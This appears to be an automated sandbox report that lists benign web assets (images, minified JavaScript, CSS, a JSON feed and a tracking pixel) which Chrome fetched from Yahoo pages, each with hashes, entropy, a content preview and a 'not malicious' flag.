                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 536x284, components 3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):60013
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.973468081508451
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:2SevKYywY3BSomxdglwxawzllzpp/f+iPVJ/rqBEqjk6W:2SeDywekomxdxawz3zL3+SPqJk3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:69F0B44D40A53AA9D4A461C7617ED0A7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:1072AFA4CB94F3C5811267C7F74D26E89FF79622
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:2596D85D41A31BE8EEEDE0D7EB0E45DB631B9E55204DF5C84C8243F65CF7DF76
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:C87A4643108A66CE62D205A2EFC906FB49D2FC8C4C56514F585D45D9E4A78C6524778084146CBE0C51B64C14BFFEFEF65C6BE2F645E005B808671C61441D6D21
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:......JFIF.............@ICC_PROFILE......0ADBE....mntrRGB XYZ .........3.;acspAPPL....none...........................-ADBE................................................cprt.......2desc...0...kwtpt........bkpt........rTRC........gTRC........bTRC........rXYZ........gXYZ........bXYZ........text....Copyright 2000 Adobe Systems Incorporated...desc........Adobe RGB (1998)................................................................................XYZ .......Q........XYZ ................curv.........3..curv.........3..curv.........3..XYZ ..........O.....XYZ ......4....,....XYZ ......&1.../.......C....................................................................C.......................................................................................................................N..........................!.1A."Q....2aq.#BR..3Sb...$CTr.....D...4%Uc..5Es...................................@.........................!..1.AQ.".#2aBq.$3R.....C...4br%DS...............?...[..m.o.>.....y...]V:.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (3666), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):3666
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.122712688435668
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:3hqjg8q1Mrsq1YrAw1Ld6UeCiyhq2WeptkcIL:3aumsu6AaLTc2en
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:9FBA2531FFA6CB0B4D3D34C56C295495
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:0EC8BCC9D8F8360CB279D78F88BBEE001AB95D30
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C6D2343A147111E4F3881E468FACC72DA4582C6AAEFF475D3371DF3FA2576BEE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BB6DC985ED5E343DB802BF07F7AF4A92BCB6788AA1F4ACBF61BB49DCFB2926C1E6CF6B1BC31544CBB98BD22D3688D2B220992CD9BED1F2E4FB43ADE8AE33F78E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-bind",[],t):"object"==typeof exports?exports["wafer-bind"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-bind"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(o){if(r[o])return r[o].exports;var n=r[o]={i:o,l:!1,exports:{}};return e[o].call(n.exports,n,n.exports,t),n.l=!0,n.exports}var r={};return t.m=e,t.c=r,t.d=function(e,r,o){t.o(e,r)||Object.defineProperty(e,r,{configurable:!1,enumerable:!0,get:o})},t.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(r,"a",r),r},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,r){"use strict";function o(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}function n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 41 x 330, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2986
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.595859761626018
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:ki3VLqI5DRFJEmlXv+2KpDRFZdtseQURsd1dA1h6wBxANNh4E6LEZU3KgCDj2fbT:7LFDXlXWzzsZj/dEBxab46SKgC+jCMNn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C2396079060A7028FA898A73B72AA592
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:81EE85D797FF9C40A19B15E4130D7F677011C5A0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:1A166EBD6C8872D71EFCEFB4765DB513014B732E1886525C5F2D5DED87071451
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:AC8F6403C6F5CD0ACEB315C0EE48DA6A3540D4C012A15A754EFEFE069CB33B6AA3124C3C5C7746185CE4A3EED7898A1AE07C170501AC78CAC16290084255CCA6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/pv/static/img/voiceSearch1x-1620383531565.min.png
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR...)...J............jPLTE...IIY..........#)E..\el.")...\dk!w..j.....j..j.'/;.:.....;.....i.....i....#+1$,4.j..............i.$+3....;..:.#*2.i..;.#+2.;.....j.....j..j..m..i........l..:....#+2#+1\dj.#).j..k..k.#(/.l.&-5.;..n..n....**7....j..:.....j.....;.....k..l.#*2.i..:.#*1.:..i..i........i........;........;.$+1....=...."%,#,5.j..i........j.....j.....j.....j...........n....#+1[dj.").:.$+1....:.$*2.:..j.......#+2.......j..;.$*2.j.....k..;....$+3.l...._fk`gn...ddm$$..A....[mm.l..i.....j....\cj................j..k..l..k..l..j.$*2.j..:.....j.#+2.;.#+1...$+1.;..k..j..:.#+4.;.$+2.i..<.%.3.=..@........j.....l.....i..C..w..i.....:.#*1[cj."(....Z.N....tRNS....*.........x.........@/....j./...eW'...V#"......}}lbR/+'#...........w8&...........ji^QPJ($$............N;/..................{xtqpoaZN?0%!............|dZZI<2!.........~{tng`^KGB972...ePG33....k....(IDATh...W.0....).Q..O.pC.......((....,...{...{o.V..Lz'......D}~..%m?$M..{m....u...=W.d.u8.....3**(....bT@.b..x...
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (30142), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):30142
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.262622575589199
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:oB+Pgmf4f4fkSpKYTwHhrZNqFQEVwWI6vLEts6XfEQxZyafRVfaPp:TPD4Af9tTwHDNqLLGsQrt4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D133CBEA9C1D56D1CBE4CB6E77F0EBF6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:9474B4E8F5149B1124468C4590E850F7BBF141F3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:5E1E920D663D0BC1E363EC56C7FCCDEDD061F95FA60158C3AF425DAA952027CA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:29A9268266585F047F69B565CDF5B1199A6D729A452513A0D534C0FA0B5886D46B7F9EDCB5948340DF45B1C4E9C942E61C53FEF102A7DBEBFF1C2191263C791B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-video",[],t):"object"==typeof exports?exports["wafer-video"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-video"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(a){if(i[a])return i[a].exports;var n=i[a]={i:a,l:!1,exports:{}};return e[a].call(n.exports,n,n.exports,t),n.l=!0,n.exports}var i={};return t.m=e,t.c=i,t.d=function(e,i,a){t.o(e,i)||Object.defineProperty(e,i,{configurable:!1,enumerable:!0,get:a})},t.n=function(e){var i=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(i,"a",i),i},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,i){"use strict";function a(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}functio
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (2088)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2089
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.0197381984490645
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:j1CKjEFkm7L9Hu5x80V35BWx7rZdnhqk9aUTvesuX+6UvrRyV1WF57TUEU3/3arj:JjoHA/w1dIkdiJtA4iP/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:841D0130C2CA45F84A74E36C91A06AAB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:311D1A7026F090201983D42BD4D6AEDCDB584F65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:19DC7FF3BE6002BF26816B2C39656CFF114ECBD5617D904371BA3E9DB3718D28
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:8059D7A3894A1DEE12315BC593989C56871873E2DF526F25C50F5AC44148E3B82411DE9A195226DC742CFBAC1B13027AD9B8E63FB0B2F25F2204DDE7C1F7045C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/assets/FeatureBarNeo.CGHKwr-8.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.paddedQSP.yf-1a92qi.yf-1a92qi{margin:var(--space-4) var(--space-4) 0}.gridLayout .no-p-b.yf-1a92qi.yf-1a92qi{border-bottom:unset;padding-bottom:unset}.fb-wrapper.yf-1a92qi.yf-1a92qi{margin-top:var(--space-3)}.fb-wrapper.paddingBottom.yf-1a92qi.yf-1a92qi{padding-bottom:var(--space-4)}.fb-contents.yf-1a92qi.yf-1a92qi{display:flex;width:100%;background-color:var(--surface4);border-radius:var(--border-radius-s)}.label.yf-1a92qi.yf-1a92qi{background-color:var(--ui-brand);font-size:var(--font-m);font-weight:var(--font-bold);color:var(--text-inverse);align-items:center;border-radius:var(--border-radius-s);display:flex;width:-moz-fit-content;width:fit-content;padding:.625rem var(--space-2)}.label.redLabel.yf-1a92qi.yf-1a92qi{background-color:var(--negative)}.label.nuetralLabel.yf-1a92qi.yf-1a92qi{color:var(--white);background-color:var(--neutral)}.dynamicInsights.yf-1a92qi .label.yf-1a92qi{padding:.391rem var(--space-2);text-align:center}.title-wrapper.yf-1a92qi.yf-1a92qi{display:flex;justify
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65528), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1351593
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.835887110795507
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:PcnvLNxBdxgE03OAd4K8J2yTOSN/CCKoO+1:PcnvLNxBdxgE0eAd4K8J2yTOSN/CCKof
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:F104D7D4B77F422FCD3314719A749068
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:DFEB8A965E664BC949FDD2159995335553735A57
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B56180EBF5D397866F12039C908EB39A3D8B8827C85D88C2240BA8D145BC92BD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:AF9C641B9DFFC6542790FA6A94A4D20E39549213D83E15BDE9D95678366AF6B83EBDE2FF4F79798EF9A811937007AAA61AEC6344939083518714B7E7A130DBB4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:{"items":[{"data":{"partnerData":{"adMeta":{"hashtag":"amazon;news;prime-day;shopping;shopping;hobbies","isSupplySegment":"false","lang":"en-US","region":"US","rs":"lmsid:a0V0W00000JIbmMUAT;revsp:yahoo_life_shopping_281;lpstaid:12dfba99-00cf-4f01-ac78-06d6c0d07524;pt:content;pd:modal;ver:megastrm;pct:story","site_attribute":"wiki_topics=\"Amazon_Prime\" ctopid=\"1878000;10610489;1720500\" hashtag=\"amazon;news;prime-day;shopping;1878000;10610489;1720500\" rs=\"lmsid:a0V0W00000JIbmMUAT;revsp:yahoo_life_shopping_281;lpstaid:12dfba99-00cf-4f01-ac78-06d6c0d07524;pt:content;pd:modal;ver:megastrm;lu:0;pct:story\"","spaceid":"1197792446","site":"lifestyle","enabled":true,"pos":"","showBodyAds":false,"showPhotoAds":false},"alias":"ymedia-alias:shadow=record-lows-on-apple-and-dyson-plus-12-more-prime-day-deals-worth-the-splurge-160520320","canonicalSite":"lifestyle","canonicalUrl":"https://www.yahoo.com/lifestyle/record-lows-on-apple-and-dyson-plus-12-more-prime-day-deals-worth-the-splurge-1605
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 300x156, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):8838
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.979102922745663
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:IlShdT4sM54kW6gjghk+OdXBdcot/vhwD65CC42hVk:bhdTxDRghHOdxdjvS65Cr2g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:633FCEC443BE18EB932417CA568E3619
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:C6C27C8DCDB2D3D9A9F6B9271182AC32076F8B88
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:435774D81AEC5767CD8CE8BDF03293328FCFC9C4D72C50A4C152E7BC489E9B92
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:1CF7D241009697388AD8FDAC52A50084451CAA0FEA43088A7A5E3FE76599875888D872D1DA5C543FA773CCFE57B3F0615E9FFE5F72A224803F5D6783981E77BF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/uu/api/res/1.2/hg3dbAi3sDeZI58WOrthCQ--~B/Zmk9c3RyaW07aD0xNTY7dz0zMDA7YXBwaWQ9eXRhY2h5b24-/https://s.yimg.com/os/creatr-uploaded-images/2024-10/f77ecae0-85a3-11ef-acff-e1584e8df32f.cf.webp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:RIFF~"..WEBPVP8 r".......*,...>y4.G...!+3....f...V.U.e.~?._.....z...<.^...._.^.\......f....[........... .P....Y./..E.....M~....k....G./...O..(.7....R.p...&K........O...q......g.xc.vq...!.Q....T......M<.H.9'.[.%.P...c.....%F...5P.<HL...S...!......j1.....W....../...A ...kv..r...e.N...9...;}.0..^ZN......Q0..K $.p2li.}............-..E(.{...\R.R........M....w.a..ps..MOQ..)C[f.......).^$dG.@..#f.Y.Z.eC.i.o..K...&E5?...\....)....r..c.......~?..b..6.J.....F......:.[(."tpf. ..........BIFBE.{HuB..JN...'..rX.M...SL>7.,..N....+...jQgS...v..6ye..8Q.i.4Y..T.....Rs.c...u..W......v.q.....R?.C.....P../I.......~vD.....?.CE..q.]..E...Bf..W?.-.......5L..C.b.P..........%.+.jNclis..-BF0..."7..B.H...g..K}..d,......t.{..5\s.yP....p..i.7..T=g.....9.:Gm.1).(.......P.OFw-...Qr.Y..M|.-.V.)......t3.C....N...4j.Um.:.........5......L(...+{.[.|.0...,..vXw...7...O...,|..7/8...)m..'...X!.C.,@.k~........O......,\.1...33B..W....dX..<.G..xL..GL.6..e .w......Kq.N..+....[.A.I
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:"https://dt.adsafeprotected.com/dt?advEntityId=2233400&asId=38c6b108-4dfa-76fb-59d4-d5cea654b422&tv=%7Bc:qyx4Ha,time:675,type:e,env:%7Bccd:%7Bversion:1,uspString:1YNN,isOathFirstParty:true,gpp:DBAA,gppSid:-1,tcString:undefined,gdprApplies:false%7D,gcd2:%7Bappl:0,cnst:na%7D%7D,es:0,sc:1,ha:1,fgad:1,fif:0,gmnp:0,for:0,b11:0,cnod:1,gm:0,slTimes:%7Bi:0,o:675,n:0,pp:0,pm:0%7D,slEvents:%5B%7Bsl:o,t:111,wc:0.0.1280.984,ac:NaN.NaN.728.90,am:i,cc:NaN.NaN.728.90,piv:0,obst:0,th:0,reas:r,bkn:%7Bpiv:%5B632~0%5D,as:%5B632~728.90%5D%7D%7D%5D,slEventCount:1,em:true,fr:false,e:,tt:rjss,dtt:0,fm:uqDOUlz+11%7C12%7C13%7C14%7C151%7C16%7C1711%7C1712%7C1713%7C1714%7C1715%7C1716%7C1717%7C1718%7C1719%7C171a%7C171b%7C171c%7C171d%7C171e%7C171f%7C171g%7C171h%7C171i%7C171j%7C171k%7C172%7C1731%7C1732%7C18%7C19%7C1a1%7C1a2%7C1a3%7C1a4%7C1a5%7C1a6%7C1b%7C1c%7C1d%7C1e%7C1f%7C1g11%7C1g12%7C1g2%7C1h%7C1i%7C1j%7C1k%7C1l1%7C1m%7C1n%7C1o%7C1p%7C1q%7C1r*.2233400-82744863%7C1r1,idMap:1r*,rmeas:1,rend:0,renddet:svg.us,siq:121%7D&br=c"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (3950)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):3951
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.847724332399652
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:8fS8oz8jvY+8CC7znlYLkEhoGh5kQJTYtG/EWGXG/Q+:Ioz8jvWCF7b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:471B58064CDF1ECA8C83D0D99B13D72D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:28D0F6DF93673CF206160C638D6624F818EA64D7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:8FAF3D53C8C710CA586D6EF44EC25C7B85F0D68B0030C0B7232C7063E1FE82B8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:815697001A4157EBE0AA78BDFF99DB7FB0266E4562E289E49DF7FA06E5FE87A3A5B19B8357219022D86BEF5AFE179F9B260B4F2991E7157B18300E52FBD30B4A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/assets/Tooltip.IRw8ojlh.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.tooltip.yf-7dju6j.yf-7dju6j{--tooltip-border-width:1px;--tooltip-arrow-size:10px;--tooltip-background:var(--surface1);--tooltip-border-color:var(--separator);--tooltip-max-width:240px;--tooltip-min-width:180px;--tooltip-border-radius:var(--border-radius-m);background-color:var(--tooltip-background);border-radius:var(--tooltip-border-radius);border:var(--tooltip-border-width) solid var(--tooltip-border-color);box-shadow:var(--shadow2);position:absolute;top:0;left:0;min-width:var(--tooltip-min-width);max-width:var(--tooltip-max-width);z-index:4;display:none;padding:var(--space-4)}.tooltip.displayed.yf-7dju6j.yf-7dju6j{display:block}.tooltip.yf-7dju6j .title.yf-7dju6j{font-size:var(--font-size, var(--font-l));font-weight:var(--font-bold)}.tooltip.yf-7dju6j .desc.yf-7dju6j{font-size:var(--font-size, var(--font-m));font-weight:var(--font-normal);font-family:var(--font-family)}.tooltip.marketing.yf-7dju6j.yf-7dju6j{--tooltip-background:var(--purple-100);--tooltip-border-color:transparent;co
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (5607)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):5608
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.484930079005549
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:GWn//1QKeh7qfcwdiSoviSeGcfJHhT4wCZnJqbxE1ALW5V1ZVw1eV5J+sIWeCo:7/iElG0BbCZnJMEt5VrVw1eV5JEWeCo
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:952D721C9F2527597068A70FF5FF2B39
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2FCA5817EEBC29A12626575E7C25DF7358D88D4B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:16D23EA7136091BC0A4F822FB07506B8A9906E27BF77EF6DBE159AD53580C2EB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:E61E0465A99DC3BD2E021FBB084148A3289E7AA920729236456A19971C3875C29793879E46612CCE027BC7C5E5AC329AC1B9665ACF8605198A2A44CA8DDC8727
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
